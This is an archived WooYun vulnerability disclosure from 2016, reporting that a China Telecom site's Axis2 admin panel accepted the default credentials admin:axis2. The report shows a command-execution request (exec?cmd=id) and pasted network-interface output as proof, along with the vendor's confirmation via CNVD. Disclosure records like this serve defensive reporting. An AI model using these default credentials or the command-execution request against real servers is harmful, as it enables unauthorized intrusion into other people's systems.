乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-26: 细节已通知厂商并且等待厂商处理中 2016-05-30: 厂商已经确认,细节仅向厂商公开 2016-06-09: 细节向核心白帽子及相关领域专家公开 2016-06-19: 细节向普通白帽子公开 2016-06-29: 细节向实习白帽子公开 2016-07-14: 细节向公众公开
中国电信某站点Axis2弱口令导致命令执行
中国电信**.**.**.**/站点Axis2弱口令导致命令执行 漏洞url:
**.**.**.**/
弱口令;
**.**.**.**:8081/axis2/axis2-admin/login admin:axis2
命令执行:
**.**.**.**:8081//axis2/services/Cat/exec?cmd=id
网卡信息:em1 Link encap:Ethernet HWaddr C8:1F:66:F3:83:1C inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::ca1f:66ff:fef3:831c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:277781247 errors:0 dropped:0 overruns:0 frame:0 TX packets:657627130 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:24852432779 (23.1 GiB) TX bytes:556645990567 (518.4 GiB) Interrupt:35 em2 Link encap:Ethernet HWaddr C8:1F:66:F3:83:1D inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::ca1f:66ff:fef3:831d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:47166782 errors:0 dropped:0 overruns:0 frame:0 TX packets:13147 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3323022428 (3.0 GiB) TX bytes:1322995 (1.2 MiB) Interrupt:38 em3 Link encap:Ethernet HWaddr C8:1F:66:F3:83:1E inet6 addr: fe80::ca1f:66ff:fef3:831e/64 Scope:Link UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:492 (492.0 b) Interrupt:34 em4 Link encap:Ethernet HWaddr C8:1F:66:F3:83:1F inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::ca1f:66ff:fef3:831f/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:325364 errors:0 dropped:0 overruns:0 frame:0 TX packets:11482 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:34115456 (32.5 MiB) TX bytes:735016 (717.7 KiB) Interrupt:36 lo Link encap:Local Loopback inet addr:**.**.**.** Mask:**.**.**.** inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:457023827 errors:0 dropped:0 overruns:0 frame:0 TX packets:457023827 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:66930954591 (62.3 GiB) TX bytes:66930954591 (62.3 GiB)
危害等级:高
漏洞Rank:10
确认时间:2016-05-30 09:35
CNVD确认所述情况,已经转由CNCERT向电信集团公司通报,由其后续协调网站管理部门处置.
暂无